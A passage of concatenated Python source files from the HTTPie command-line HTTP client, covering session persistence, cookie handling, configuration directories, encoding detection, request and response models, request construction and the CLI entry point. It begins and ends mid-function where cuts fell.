return self._is_local_host(cookiejar.request_host(request)) def _is_local_host(self, hostname): # Implements the static localhost detection algorithm in firefox. # <https://searchfox.org/mozilla-central/rev/d4d7611ee4dd0003b492b865bc5988a4e6afc985/netwerk/dns/DNS.cpp#205-218> return hostname == _LOCALHOST or hostname.endswith(_LOCALHOST_SUFFIX) File: httpie/sessions.py """ Persistent, JSON-serialized sessions. """ import os import re from http.cookies import SimpleCookie from http.cookiejar import Cookie from pathlib import Path from typing import Any, Dict, List, Optional, Union from requests.auth import AuthBase from requests.cookies import RequestsCookieJar, remove_cookie_by_name from .context import Environment, LogLevel from .cookies import HTTPieCookiePolicy from .cli.dicts import HTTPHeadersDict from .config import BaseConfigDict, DEFAULT_CONFIG_DIR from .utils import url_as_host from .plugins.registry import plugin_manager from .legacy import ( v3_1_0_session_cookie_format as legacy_cookies, v3_2_0_session_header_format as legacy_headers ) SESSIONS_DIR_NAME = 'sessions' DEFAULT_SESSIONS_DIR = DEFAULT_CONFIG_DIR / SESSIONS_DIR_NAME VALID_SESSION_NAME_PATTERN = re.compile('^[a-zA-Z0-9_.-]+$') # Request headers starting with these prefixes won't be stored in sessions. # They are specific to each request. # <https://en.wikipedia.org/wiki/List_of_HTTP_header_fields#Requests> SESSION_IGNORED_HEADER_PREFIXES = ['Content-', 'If-'] # Cookie related options KEPT_COOKIE_OPTIONS = ['name', 'expires', 'path', 'value', 'domain', 'secure'] DEFAULT_COOKIE_PATH = '/' def is_anonymous_session(session_name: str) -> bool: return os.path.sep in session_name def session_hostname_to_dirname(hostname: str, session_name: str) -> str: # host:port => host_port hostname = hostname.replace(':', '_') return os.path.join( SESSIONS_DIR_NAME, hostname, f'{session_name}.json' ) def strip_port(hostname: str) -> str: return hostname.split(':')[0] def materialize_cookie(cookie: Cookie) -> Dict[str, Any]: materialized_cookie = { option: getattr(cookie, option) for option in KEPT_COOKIE_OPTIONS } if ( cookie._rest.get('is_explicit_none') and materialized_cookie['domain'] == '' ): materialized_cookie['domain'] = None return materialized_cookie def materialize_cookies(jar: RequestsCookieJar) -> List[Dict[str, Any]]: return [ materialize_cookie(cookie) for cookie in jar ] def materialize_headers(headers: Dict[str, str]) -> List[Dict[str, Any]]: return [ { 'name': name, 'value': value } for name, value in headers.copy().items() ] def get_httpie_session( env: Environment, config_dir: Path, session_name: str, host: Optional[str], url: str, *, suppress_legacy_warnings: bool = False ) -> 'Session': bound_hostname = host or url_as_host(url) if not bound_hostname: # HACK/FIXME: httpie-unixsocket's URLs have no hostname. 
bound_hostname = 'localhost' if is_anonymous_session(session_name): path = os.path.expanduser(session_name) session_id = path else: path = config_dir / session_hostname_to_dirname(bound_hostname, session_name) session_id = session_name session = Session( path, env=env, session_id=session_id, bound_host=strip_port(bound_hostname), suppress_legacy_warnings=suppress_legacy_warnings ) session.load() return session class Session(BaseConfigDict): helpurl = 'https://httpie.io/docs#sessions' about = 'HTTPie session file' def __init__( self, path: Union[str, Path], env: Environment, bound_host: str, session_id: str, suppress_legacy_warnings: bool = False, ): super().__init__(path=Path(path)) # Default values for the session files self['headers'] = [] self['cookies'] = [] self['auth'] = { 'type': None, 'username': None, 'password': None } # Runtime state of the Session objects. self.env = env self._headers = HTTPHeadersDict() self.cookie_jar = RequestsCookieJar( # See also a temporary workaround for a Requests bug in `compat.py`. policy=HTTPieCookiePolicy(), ) self.session_id = session_id self.bound_host = bound_host self.suppress_legacy_warnings = suppress_legacy_warnings def _add_cookies(self, cookies: List[Dict[str, Any]]) -> None: for cookie in cookies: domain = cookie.get('domain', '') if domain is None: # domain = None means explicitly lack of cookie, though # requests requires domain to be a string so we'll cast it # manually. cookie['domain'] = '' cookie['rest'] = {'is_explicit_none': True} self.cookie_jar.set(**cookie) def pre_process_data(self, data: Dict[str, Any]) -> Dict[str, Any]: for key, deserializer, importer in [ ('cookies', legacy_cookies.pre_process, self._add_cookies), ('headers', legacy_headers.pre_process, self._headers.update), ]: values = data.get(key) if values: normalized_values = deserializer(self, values) else: normalized_values = [] importer(normalized_values) return data def post_process_data(self, data: Dict[str, Any]) -> Dict[str, Any]: for key, store, serializer, exporter in [ ('cookies', self.cookie_jar, materialize_cookies, legacy_cookies.post_process), ('headers', self._headers, materialize_headers, legacy_headers.post_process), ]: original_type = type(data.get(key)) values = serializer(store) data[key] = exporter( values, original_type=original_type ) return data def _compute_new_headers(self, request_headers: HTTPHeadersDict) -> HTTPHeadersDict: new_headers = HTTPHeadersDict() for name, value in request_headers.copy().items(): if value is None: continue # Ignore explicitly unset headers original_value = value if type(value) is not str: value = value.decode() if name.lower() == 'user-agent' and value.startswith('HTTPie/'): continue if name.lower() == 'cookie': for cookie_name, morsel in SimpleCookie(value).items(): if not morsel['path']: morsel['path'] = DEFAULT_COOKIE_PATH self.cookie_jar.set(cookie_name, morsel) request_headers.remove_item(name, original_value) continue for prefix in SESSION_IGNORED_HEADER_PREFIXES: if name.lower().startswith(prefix.lower()): break else: new_headers.add(name, value) return new_headers def update_headers(self, request_headers: HTTPHeadersDict): """ Update the session headers with the request ones while ignoring certain name prefixes. """ new_headers = self._compute_new_headers(request_headers) new_keys = new_headers.copy().keys() # New headers will take priority over the existing ones, and override # them directly instead of extending them. 
for key, value in self._headers.copy().items(): if key in new_keys: continue new_headers.add(key, value) self._headers = new_headers @property def headers(self) -> HTTPHeadersDict: return self._headers.copy() @property def cookies(self) -> RequestsCookieJar: self.cookie_jar.clear_expired_cookies() return self.cookie_jar @cookies.setter def cookies(self, jar: RequestsCookieJar): self.cookie_jar = jar def remove_cookies(self, cookies: List[Dict[str, str]]): for cookie in cookies: remove_cookie_by_name( self.cookie_jar, cookie['name'], domain=cookie.get('domain', None), path=cookie.get('path', None) ) @property def auth(self) -> Optional[AuthBase]: auth = self.get('auth', None) if not auth or not auth['type']: return plugin = plugin_manager.get_auth_plugin(auth['type'])() credentials = {'username': None, 'password': None} try: # New style plugin.raw_auth = auth['raw_auth'] except KeyError: # Old style credentials = { 'username': auth['username'], 'password': auth['password'], } else: if plugin.auth_parse: from .cli.argtypes import parse_auth parsed = parse_auth(plugin.raw_auth) credentials = { 'username': parsed.key, 'password': parsed.value, } return plugin.get_auth(**credentials) @auth.setter def auth(self, auth: dict): assert {'type', 'raw_auth'} == auth.keys() self['auth'] = auth @property def is_anonymous(self): return is_anonymous_session(self.session_id) def warn_legacy_usage(self, warning: str) -> None: if self.suppress_legacy_warnings: return None self.env.log_error( warning, level=LogLevel.WARNING ) # We don't want to spam multiple warnings on each usage, # so if there is already a warning for the legacy usage # we'll skip the next ones. self.suppress_legacy_warnings = True File: httpie/config.py import json import os from pathlib import Path from typing import Any, Dict, Union from . import __version__ from .compat import is_windows from .encoding import UTF8 ENV_XDG_CONFIG_HOME = 'XDG_CONFIG_HOME' ENV_HTTPIE_CONFIG_DIR = 'HTTPIE_CONFIG_DIR' DEFAULT_CONFIG_DIRNAME = 'httpie' DEFAULT_RELATIVE_XDG_CONFIG_HOME = Path('.config') DEFAULT_RELATIVE_LEGACY_CONFIG_DIR = Path('.httpie') DEFAULT_WINDOWS_CONFIG_DIR = Path( os.path.expandvars('%APPDATA%')) / DEFAULT_CONFIG_DIRNAME def get_default_config_dir() -> Path: """ Return the path to the httpie configuration directory. This directory isn't guaranteed to exist, and nor are any of its ancestors (only the legacy ~/.httpie, if returned, is guaranteed to exist). XDG Base Directory Specification support: <https://wiki.archlinux.org/index.php/XDG_Base_Directory> $XDG_CONFIG_HOME is supported; $XDG_CONFIG_DIRS is not """ # 1. explicitly set through env env_config_dir = os.environ.get(ENV_HTTPIE_CONFIG_DIR) if env_config_dir: return Path(env_config_dir) # 2. Windows if is_windows: return DEFAULT_WINDOWS_CONFIG_DIR home_dir = Path.home() # 3. legacy ~/.httpie legacy_config_dir = home_dir / DEFAULT_RELATIVE_LEGACY_CONFIG_DIR if legacy_config_dir.exists(): return legacy_config_dir # 4. XDG xdg_config_home_dir = os.environ.get( ENV_XDG_CONFIG_HOME, # 4.1. explicit home_dir / DEFAULT_RELATIVE_XDG_CONFIG_HOME # 4.2. 
default ) return Path(xdg_config_home_dir) / DEFAULT_CONFIG_DIRNAME DEFAULT_CONFIG_DIR = get_default_config_dir() class ConfigFileError(Exception): pass def read_raw_config(config_type: str, path: Path) -> Dict[str, Any]: try: with path.open(encoding=UTF8) as f: try: return json.load(f) except ValueError as e: raise ConfigFileError( f'invalid {config_type} file: {e} [{path}]' ) except FileNotFoundError: pass except OSError as e: raise ConfigFileError(f'cannot read {config_type} file: {e}') class BaseConfigDict(dict): name = None helpurl = None about = None def __init__(self, path: Path): super().__init__() self.path = path def ensure_directory(self): self.path.parent.mkdir(mode=0o700, parents=True, exist_ok=True) def is_new(self) -> bool: return not self.path.exists() def pre_process_data(self, data: Dict[str, Any]) -> Dict[str, Any]: """Hook for processing the incoming config data.""" return data def post_process_data(self, data: Dict[str, Any]) -> Dict[str, Any]: """Hook for processing the outgoing config data.""" return data def load(self): config_type = type(self).__name__.lower() data = read_raw_config(config_type, self.path) if data is not None: data = self.pre_process_data(data) self.update(data) def save(self, *, bump_version: bool = False): self.setdefault('__meta__', {}) if bump_version or 'httpie' not in self['__meta__']: self['__meta__']['httpie'] = __version__ if self.helpurl: self['__meta__']['help'] = self.helpurl if self.about: self['__meta__']['about'] = self.about self.ensure_directory() json_string = json.dumps( obj=self.post_process_data(self), indent=4, sort_keys=True, ensure_ascii=True, ) self.path.write_text(json_string + '\n', encoding=UTF8) @property def version(self): return self.get( '__meta__', {} ).get('httpie', __version__) class Config(BaseConfigDict): FILENAME = 'config.json' DEFAULTS = { 'default_options': [] } def __init__(self, directory: Union[str, Path] = DEFAULT_CONFIG_DIR): self.directory = Path(directory) super().__init__(path=self.directory / self.FILENAME) self.update(self.DEFAULTS) @property def default_options(self) -> list: return self['default_options'] def _configured_path(self, config_option: str, default: str) -> None: return Path( self.get(config_option, self.directory / default) ).expanduser().resolve() @property def plugins_dir(self) -> Path: return self._configured_path('plugins_dir', 'plugins') @property def version_info_file(self) -> Path: return self._configured_path('version_info_file', 'version_info.json') @property def developer_mode(self) -> bool: """This is a special setting for the development environment. It is different from the --debug mode in the terms that it might change the behavior for certain parameters (e.g updater system) that we usually ignore.""" return self.get('developer_mode') File: httpie/compat.py import sys from typing import Any, Optional, Iterable from httpie.cookies import HTTPieCookiePolicy from http import cookiejar # noqa # Request does not carry the original policy attached to the # cookie jar, so until it is resolved we change the global cookie # policy. <https://github.com/psf/requests/issues/5449> cookiejar.DefaultCookiePolicy = HTTPieCookiePolicy is_windows = 'win32' in str(sys.platform).lower() is_frozen = getattr(sys, 'frozen', False) MIN_SUPPORTED_PY_VERSION = (3, 7) MAX_SUPPORTED_PY_VERSION = (3, 11) try: from functools import cached_property except ImportError: # Can be removed once we drop Python <3.8 support. # Taken from `django.utils.functional.cached_property`. 
class cached_property: """ Decorator that converts a method with a single self argument into a property cached on the instance. A cached property can be made out of an existing method: (e.g. ``url = cached_property(get_absolute_url)``). The optional ``name`` argument is obsolete as of Python 3.6 and will be deprecated in Django 4.0 (#30127). """ name = None @staticmethod def func(instance): raise TypeError( 'Cannot use cached_property instance without calling ' '__set_name__() on it.' ) def __init__(self, func, name=None): self.real_func = func self.__doc__ = getattr(func, '__doc__') def __set_name__(self, owner, name): if self.name is None: self.name = name self.func = self.real_func elif name != self.name: raise TypeError( "Cannot assign the same cached_property to two different names " "(%r and %r)." % (self.name, name) ) def __get__(self, instance, cls=None): """ Call the function and put the return value in instance.__dict__ so that subsequent attribute access on the instance returns the cached value instead of calling cached_property.__get__(). """ if instance is None: return self res = instance.__dict__[self.name] = self.func(instance) return res # importlib_metadata was a provisional module, so the APIs changed quite a few times # between 3.8-3.10. It was also not included in the standard library until 3.8, so # we install the backport for <3.8. if sys.version_info >= (3, 8): import importlib.metadata as importlib_metadata else: import importlib_metadata def find_entry_points(entry_points: Any, group: str) -> Iterable[importlib_metadata.EntryPoint]: if hasattr(entry_points, "select"): # Python 3.10+ / importlib_metadata >= 3.9.0 return entry_points.select(group=group) else: return set(entry_points.get(group, ())) def get_dist_name(entry_point: importlib_metadata.EntryPoint) -> Optional[str]: dist = getattr(entry_point, "dist", None) if dist is not None: # Python 3.10+ return dist.name match = entry_point.pattern.match(entry_point.value) if not (match and match.group('module')): return None package = match.group('module').split('.')[0] try: metadata = importlib_metadata.metadata(package) except importlib_metadata.PackageNotFoundError: return None else: return metadata.get('name') File: httpie/encoding.py from typing import Union, Tuple from charset_normalizer import from_bytes from charset_normalizer.constant import TOO_SMALL_SEQUENCE UTF8 = 'utf-8' ContentBytes = Union[bytearray, bytes] def detect_encoding(content: ContentBytes) -> str: """ We default to UTF-8 if text too short, because the detection can return a random encoding leading to confusing results given the `charset_normalizer` version (< 2.0.5). >>> too_short = ']"foo"' >>> detected = from_bytes(too_short.encode()).best().encoding >>> detected 'ascii' >>> too_short.encode().decode(detected) ']"foo"' """ encoding = UTF8 if len(content) > TOO_SMALL_SEQUENCE: match = from_bytes(bytes(content)).best() if match: encoding = match.encoding return encoding def smart_decode(content: ContentBytes, encoding: str) -> Tuple[str, str]: """Decode `content` using the given `encoding`. If no `encoding` is provided, the best effort is to guess it from `content`. Unicode errors are replaced. """ if not encoding: encoding = detect_encoding(content) return content.decode(encoding, 'replace'), encoding def smart_encode(content: str, encoding: str) -> bytes: """Encode `content` using the given `encoding`. Unicode errors are replaced. 
""" return content.encode(encoding, 'replace') File: httpie/models.py from time import monotonic import requests from urllib3.util import SKIP_HEADER, SKIPPABLE_HEADERS from enum import Enum, auto from typing import Iterable, Union, NamedTuple from urllib.parse import urlsplit from .cli.constants import ( OUT_REQ_BODY, OUT_REQ_HEAD, OUT_RESP_BODY, OUT_RESP_HEAD, OUT_RESP_META ) from .compat import cached_property from .utils import split_cookies, parse_content_type_header ELAPSED_TIME_LABEL = 'Elapsed time' class HTTPMessage: """Abstract class for HTTP messages.""" def __init__(self, orig): self._orig = orig def iter_body(self, chunk_size: int) -> Iterable[bytes]: """Return an iterator over the body.""" raise NotImplementedError def iter_lines(self, chunk_size: int) -> Iterable[bytes]: """Return an iterator over the body yielding (`line`, `line_feed`).""" raise NotImplementedError @property def headers(self) -> str: """Return a `str` with the message's headers.""" raise NotImplementedError @property def metadata(self) -> str: """Return metadata about the current message.""" raise NotImplementedError @cached_property def encoding(self) -> str: ct, params = parse_content_type_header(self.content_type) return params.get('charset', '') @property def content_type(self) -> str: """Return the message content type.""" ct = self._orig.headers.get('Content-Type', '') if not isinstance(ct, str): ct = ct.decode() return ct class HTTPResponse(HTTPMessage): """A :class:`requests.models.Response` wrapper.""" def iter_body(self, chunk_size=1): return self._orig.iter_content(chunk_size=chunk_size) def iter_lines(self, chunk_size): return ((line, b'\n') for line in self._orig.iter_lines(chunk_size)) @property def headers(self): original = self._orig status_line = f'HTTP/{self.version} {original.status_code} {original.reason}' headers = [status_line] headers.extend( ': '.join(header) for header in original.headers.items() if header[0] != 'Set-Cookie' ) headers.extend( f'Set-Cookie: {cookie}' for header, value in original.headers.items() for cookie in split_cookies(value) if header == 'Set-Cookie' ) return '\r\n'.join(headers) @property def metadata(self) -> str: data = {} time_to_parse_headers = self._orig.elapsed.total_seconds() # noinspection PyProtectedMember time_since_headers_parsed = monotonic() - self._orig._httpie_headers_parsed_at time_elapsed = time_to_parse_headers + time_since_headers_parsed # data['Headers time'] = str(round(time_to_parse_headers, 5)) + 's' # data['Body time'] = str(round(time_since_headers_parsed, 5)) + 's' data[ELAPSED_TIME_LABEL] = str(round(time_elapsed, 10)) + 's' return '\n'.join( f'{key}: {value}' for key, value in data.items() ) @property def version(self) -> str: """ Return the HTTP version used by the server, e.g. '1.1'. Assume HTTP/1.1 if version is not available. 
""" mapping = { 9: '0.9', 10: '1.0', 11: '1.1', 20: '2.0', } fallback = 11 version = None try: raw = self._orig.raw if getattr(raw, '_original_response', None): version = raw._original_response.version else: version = raw.version except AttributeError: pass return mapping[version or fallback] class HTTPRequest(HTTPMessage): """A :class:`requests.models.Request` wrapper.""" def iter_body(self, chunk_size): yield self.body def iter_lines(self, chunk_size): yield self.body, b'' @property def headers(self): url = urlsplit(self._orig.url) request_line = '{method} {path}{query} HTTP/1.1'.format( method=self._orig.method, path=url.path or '/', query=f'?{url.query}' if url.query else '' ) headers = self._orig.headers.copy() if 'Host' not in self._orig.headers: headers['Host'] = url.netloc.split('@')[-1] headers = [ f'{name}: {value if isinstance(value, str) else value.decode()}' for name, value in headers.items() if not (name.lower() in SKIPPABLE_HEADERS and value == SKIP_HEADER) ] headers.insert(0, request_line) headers = '\r\n'.join(headers).strip() return headers @property def body(self): body = self._orig.body if isinstance(body, str): # Happens with JSON/form request data parsed from the command line. body = body.encode() return body or b'' RequestsMessage = Union[requests.PreparedRequest, requests.Response] class RequestsMessageKind(Enum): REQUEST = auto() RESPONSE = auto() def infer_requests_message_kind(message: RequestsMessage) -> RequestsMessageKind: if isinstance(message, requests.PreparedRequest): return RequestsMessageKind.REQUEST elif isinstance(message, requests.Response): return RequestsMessageKind.RESPONSE else: raise TypeError(f"Unexpected message type: {type(message).__name__}") OPTION_TO_PARAM = { RequestsMessageKind.REQUEST: { 'headers': OUT_REQ_HEAD, 'body': OUT_REQ_BODY, }, RequestsMessageKind.RESPONSE: { 'headers': OUT_RESP_HEAD, 'body': OUT_RESP_BODY, 'meta': OUT_RESP_META } } class OutputOptions(NamedTuple): kind: RequestsMessageKind headers: bool body: bool meta: bool = False def any(self): return ( self.headers or self.body or self.meta ) @classmethod def from_message( cls, message: RequestsMessage, raw_args: str = '', **kwargs ): kind = infer_requests_message_kind(message) options = { option: param in raw_args for option, param in OPTION_TO_PARAM[kind].items() } options.update(kwargs) return cls( kind=kind, **options ) File: httpie/client.py import argparse import http.client import json import sys from contextlib import contextmanager from time import monotonic from typing import Any, Dict, Callable, Iterable from urllib.parse import urlparse, urlunparse import requests # noinspection PyPackageRequirements import urllib3 from urllib3.util import SKIP_HEADER, SKIPPABLE_HEADERS from . 
import __version__ from .adapters import HTTPieHTTPAdapter from .cli.constants import HTTP_OPTIONS from .cli.dicts import HTTPHeadersDict from .cli.nested_json import unwrap_top_level_list_if_needed from .context import Environment from .encoding import UTF8 from .models import RequestsMessage from .plugins.registry import plugin_manager from .sessions import get_httpie_session from .ssl_ import AVAILABLE_SSL_VERSION_ARG_MAPPING, HTTPieCertificate, HTTPieHTTPSAdapter from .uploads import ( compress_request, prepare_request_body, get_multipart_data_and_content_type, ) from .utils import get_expired_cookies, repr_dict urllib3.disable_warnings() FORM_CONTENT_TYPE = f'application/x-www-form-urlencoded; charset={UTF8}' JSON_CONTENT_TYPE = 'application/json' JSON_ACCEPT = f'{JSON_CONTENT_TYPE}, */*;q=0.5' DEFAULT_UA = f'HTTPie/{__version__}' IGNORE_CONTENT_LENGTH_METHODS = frozenset([HTTP_OPTIONS]) def collect_messages( env: Environment, args: argparse.Namespace, request_body_read_callback: Callable[[bytes], None] = None, ) -> Iterable[RequestsMessage]: httpie_session = None httpie_session_headers = None if args.session or args.session_read_only: httpie_session = get_httpie_session( env=env, config_dir=env.config.directory, session_name=args.session or args.session_read_only, host=args.headers.get('Host'), url=args.url, ) httpie_session_headers = httpie_session.headers request_kwargs = make_request_kwargs( env, args=args, base_headers=httpie_session_headers, request_body_read_callback=request_body_read_callback ) send_kwargs = make_send_kwargs(args) send_kwargs_mergeable_from_env = make_send_kwargs_mergeable_from_env(args) requests_session = build_requests_session( ssl_version=args.ssl_version, ciphers=args.ciphers, verify=bool(send_kwargs_mergeable_from_env['verify']) ) if httpie_session: httpie_session.update_headers(request_kwargs['headers']) requests_session.cookies = httpie_session.cookies if args.auth_plugin: # Save auth from CLI to HTTPie session. httpie_session.auth = { 'type': args.auth_plugin.auth_type, 'raw_auth': args.auth_plugin.raw_auth, } elif httpie_session.auth: # Apply auth from HTTPie session request_kwargs['auth'] = httpie_session.auth if args.debug: # TODO: reflect the split between request and send kwargs. 
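        # `request_kwargs` is exactly what gets passed to `requests.Request(**...)`
        # just below: method, url, headers, data, auth and params. Send-time
        # options (timeout, proxies, verify, cert) live in the separate
        # send_kwargs dicts and are therefore missing from this dump.
        # Roughly (illustrative values only), `http --debug pie.dev/get` prints
        # something like
        #   >>> requests.request(**{'method': 'get', 'url': '...', 'headers': ..., ...})
        # to stderr before the request is sent.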
dump_request(request_kwargs) request = requests.Request(**request_kwargs) prepared_request = requests_session.prepare_request(request) transform_headers(request, prepared_request) if args.path_as_is: prepared_request.url = ensure_path_as_is( orig_url=args.url, prepped_url=prepared_request.url, ) if args.compress and prepared_request.body: compress_request( request=prepared_request, always=args.compress > 1, ) response_count = 0 expired_cookies = [] while prepared_request: yield prepared_request if not args.offline: send_kwargs_merged = requests_session.merge_environment_settings( url=prepared_request.url, **send_kwargs_mergeable_from_env, ) with max_headers(args.max_headers): response = requests_session.send( request=prepared_request, **send_kwargs_merged, **send_kwargs, ) response._httpie_headers_parsed_at = monotonic() expired_cookies += get_expired_cookies( response.headers.get('Set-Cookie', '') ) response_count += 1 if response.next: if args.max_redirects and response_count == args.max_redirects: raise requests.TooManyRedirects if args.follow: prepared_request = response.next if args.all: yield response continue yield response break if httpie_session: if httpie_session.is_new() or not args.session_read_only: httpie_session.cookies = requests_session.cookies httpie_session.remove_cookies(expired_cookies) httpie_session.save() # noinspection PyProtectedMember @contextmanager def max_headers(limit): # <https://github.com/httpie/cli/issues/802> # noinspection PyUnresolvedReferences orig = http.client._MAXHEADERS http.client._MAXHEADERS = limit or float('Inf') try: yield finally: http.client._MAXHEADERS = orig def build_requests_session( verify: bool, ssl_version: str = None, ciphers: str = None, ) -> requests.Session: requests_session = requests.Session() # Install our adapter. http_adapter = HTTPieHTTPAdapter() https_adapter = HTTPieHTTPSAdapter( ciphers=ciphers, verify=verify, ssl_version=( AVAILABLE_SSL_VERSION_ARG_MAPPING[ssl_version] if ssl_version else None ), ) requests_session.mount('http://', http_adapter) requests_session.mount('https://', https_adapter) # Install adapters from plugins. for plugin_cls in plugin_manager.get_transport_plugins(): transport_plugin = plugin_cls() requests_session.mount( prefix=transport_plugin.prefix, adapter=transport_plugin.get_adapter(), ) return requests_session def dump_request(kwargs: dict): sys.stderr.write( f'\n>>> requests.request(**{repr_dict(kwargs)})\n\n') def finalize_headers(headers: HTTPHeadersDict) -> HTTPHeadersDict: final_headers = HTTPHeadersDict() for name, value in headers.items(): if value is not None: # “leading or trailing LWS MAY be removed without # changing the semantics of the field value” # <https://www.w3.org/Protocols/rfc2616/rfc2616-sec4.html> # Also, requests raises `InvalidHeader` for leading spaces. value = value.strip() if isinstance(value, str): # See <https://github.com/httpie/cli/issues/212> value = value.encode() elif name.lower() in SKIPPABLE_HEADERS: # Some headers get overwritten by urllib3 when set to `None` # and should be replaced with the `SKIP_HEADER` constant. value = SKIP_HEADER final_headers.add(name, value) return final_headers def transform_headers( request: requests.Request, prepared_request: requests.PreparedRequest ) -> None: """Apply various transformations on top of the `prepared_requests`'s headers to change the request prepreation behavior.""" # Remove 'Content-Length' when it is misplaced by requests. 
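    # requests may add `Content-Length: 0` while preparing a body-less request;
    # for methods listed in IGNORE_CONTENT_LENGTH_METHODS (currently just
    # OPTIONS) we drop it again, unless the original, unprepared headers show
    # that the user asked for `Content-Length: 0` explicitly.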
if ( prepared_request.method in IGNORE_CONTENT_LENGTH_METHODS and prepared_request.headers.get('Content-Length') == '0' and request.headers.get('Content-Length') != '0' ): prepared_request.headers.pop('Content-Length') apply_missing_repeated_headers( request.headers, prepared_request ) def apply_missing_repeated_headers( original_headers: HTTPHeadersDict, prepared_request: requests.PreparedRequest ) -> None: """Update the given `prepared_request`'s headers with the original ones. This allows the requests to be prepared as usual, and then later merged with headers that are specified multiple times.""" new_headers = HTTPHeadersDict(prepared_request.headers) for prepared_name, prepared_value in prepared_request.headers.items(): if prepared_name not in original_headers: continue original_keys, original_values = zip(*filter( lambda item: item[0].casefold() == prepared_name.casefold(), original_headers.items() )) if prepared_value not in original_values: # If the current value is not among the initial values # set for this field, then it means that this field got # overridden on the way, and we should preserve it. continue new_headers.popone(prepared_name) new_headers.update(zip(original_keys, original_values)) prepared_request.headers = new_headers def make_default_headers(args: argparse.Namespace) -> HTTPHeadersDict: default_headers = HTTPHeadersDict({ 'User-Agent': DEFAULT_UA }) auto_json = args.data and not args.form if args.json or auto_json: default_headers['Accept'] = JSON_ACCEPT if args.json or (auto_json and args.data): default_headers['Content-Type'] = JSON_CONTENT_TYPE elif args.form and not args.files: # If sending files, `requests` will set # the `Content-Type` for us. default_headers['Content-Type'] = FORM_CONTENT_TYPE return default_headers def make_send_kwargs(args: argparse.Namespace) -> dict: return { 'timeout': args.timeout or None, 'allow_redirects': False, } def make_send_kwargs_mergeable_from_env(args: argparse.Namespace) -> dict: cert = None if args.cert: cert = args.cert if args.cert_key: # Having a client certificate key passphrase is not supported # by requests. So we are using our own transportation structure # which is compatible with their format (a tuple of minimum two # items). # # See: https://github.com/psf/requests/issues/2519 cert = HTTPieCertificate(cert, args.cert_key, args.cert_key_pass.value) return { 'proxies': {p.key: p.value for p in args.proxy}, 'stream': True, 'verify': { 'yes': True, 'true': True, 'no': False, 'false': False, }.get(args.verify.lower(), args.verify), 'cert': cert, } def json_dict_to_request_body(data: Dict[str, Any]) -> str: data = unwrap_top_level_list_if_needed(data) if data: data = json.dumps(data) else: # We need to set data to an empty string to prevent requests # from assigning an empty list to `response.request.data`. data = '' return data def make_request_kwargs( env: Environment, args: argparse.Namespace, base_headers: HTTPHeadersDict = None, request_body_read_callback=lambda chunk: chunk ) -> dict: """ Translate our `args` into `requests.Request` keyword arguments. """ files = args.files # Serialize JSON data, if needed. data = args.data auto_json = data and not args.form if (args.json or auto_json) and isinstance(data, dict): data = json_dict_to_request_body(data) # Finalize headers. 
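    # Header precedence, lowest to highest: computed defaults, headers stored
    # in the HTTPie session (`base_headers`), then headers given on the command
    # line. For example, a session header `Foo: a` combined with a CLI header
    # `Foo: b` is expected to end up being sent as `Foo: b`.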
headers = make_default_headers(args) if base_headers: headers.update(base_headers) headers.update(args.headers) if args.offline and args.chunked and 'Transfer-Encoding' not in headers: # When online, we let requests set the header instead to be able more # easily verify chunking is taking place. headers['Transfer-Encoding'] = 'chunked' headers = finalize_headers(headers) if (args.form and files) or args.multipart: data, headers['Content-Type'] = get_multipart_data_and_content_type( data=args.multipart_data, boundary=args.boundary, content_type=args.headers.get('Content-Type'), ) return { 'method': args.method.lower(), 'url': args.url, 'headers': headers, 'data': prepare_request_body( env, data, body_read_callback=request_body_read_callback, chunked=args.chunked, offline=args.offline, content_length_header_value=headers.get('Content-Length'), ), 'auth': args.auth, 'params': args.params.items(), } def ensure_path_as_is(orig_url: str, prepped_url: str) -> str: """ Handle `--path-as-is` by replacing the path component of the prepared URL with the path component from the original URL. Other parts stay untouched because other (welcome) processing on the URL might have taken place. <https://github.com/httpie/cli/issues/895> <https://ec.haxx.se/http/http-basics#path-as-is> <https://curl.haxx.se/libcurl/c/CURLOPT_PATH_AS_IS.html> >>> ensure_path_as_is('http://foo/../', 'http://foo/?foo=bar') 'http://foo/../?foo=bar' """ parsed_orig, parsed_prepped = urlparse(orig_url), urlparse(prepped_url) final_dict = { # noinspection PyProtectedMember **parsed_prepped._asdict(), 'path': parsed_orig.path, } return urlunparse(tuple(final_dict.values())) File: httpie/__init__.py """ HTTPie: modern, user-friendly command-line HTTP client for the API era. """ __version__ = '3.2.3' __date__ = '2024-07-10' __author__ = 'Jakub Roztocil' __licence__ = 'BSD' File: httpie/core.py import argparse import os import platform import sys import socket from typing import List, Optional, Union, Callable import requests from pygments import __version__ as pygments_version from requests import __version__ as requests_version from . 
import __version__ as httpie_version from .cli.constants import OUT_REQ_BODY from .cli.nested_json import NestedJSONSyntaxError from .client import collect_messages from .context import Environment, LogLevel from .downloads import Downloader from .models import ( RequestsMessageKind, OutputOptions ) from .output.models import ProcessingOptions from .output.writer import write_message, write_stream, write_raw_data, MESSAGE_SEPARATOR_BYTES from .plugins.registry import plugin_manager from .status import ExitStatus, http_status_to_exit_status from .utils import unwrap_context from .internal.update_warnings import check_updates from .internal.daemon_runner import is_daemon_mode, run_daemon_task # noinspection PyDefaultArgument def raw_main( parser: argparse.ArgumentParser, main_program: Callable[[argparse.Namespace, Environment], ExitStatus], args: List[Union[str, bytes]] = sys.argv, env: Environment = Environment(), use_default_options: bool = True, ) -> ExitStatus: program_name, *args = args env.program_name = os.path.basename(program_name) args = decode_raw_args(args, env.stdin_encoding) if is_daemon_mode(args): return run_daemon_task(env, args) plugin_manager.load_installed_plugins(env.config.plugins_dir) if use_default_options and env.config.default_options: args = env.config.default_options + args include_debug_info = '--debug' in args include_traceback = include_debug_info or '--traceback' in args def handle_generic_error(e, annotation=None): msg = str(e) if hasattr(e, 'request'): request = e.request if hasattr(request, 'url'): msg = ( f'{msg} while doing a {request.method}' f' request to URL: {request.url}' ) if annotation: msg += annotation env.log_error(f'{type(e).__name__}: {msg}') if include_traceback: raise if include_debug_info: print_debug_info(env) if args == ['--debug']: return ExitStatus.SUCCESS exit_status = ExitStatus.SUCCESS try: parsed_args = parser.parse_args( args=args, env=env, ) except NestedJSONSyntaxError as exc: env.stderr.write(str(exc) + "\n") if include_traceback: raise exit_status = ExitStatus.ERROR except KeyboardInterrupt: env.stderr.write('\n') if include_traceback: raise exit_status = ExitStatus.ERROR_CTRL_C except SystemExit as e: if e.code != ExitStatus.SUCCESS: env.stderr.write('\n') if include_traceback: raise exit_status = ExitStatus.ERROR else: check_updates(env) try: exit_status = main_program( args=parsed_args, env=env, ) except KeyboardInterrupt: env.stderr.write('\n') if include_traceback: raise exit_status = ExitStatus.ERROR_CTRL_C except SystemExit as e: if e.code != ExitStatus.SUCCESS: 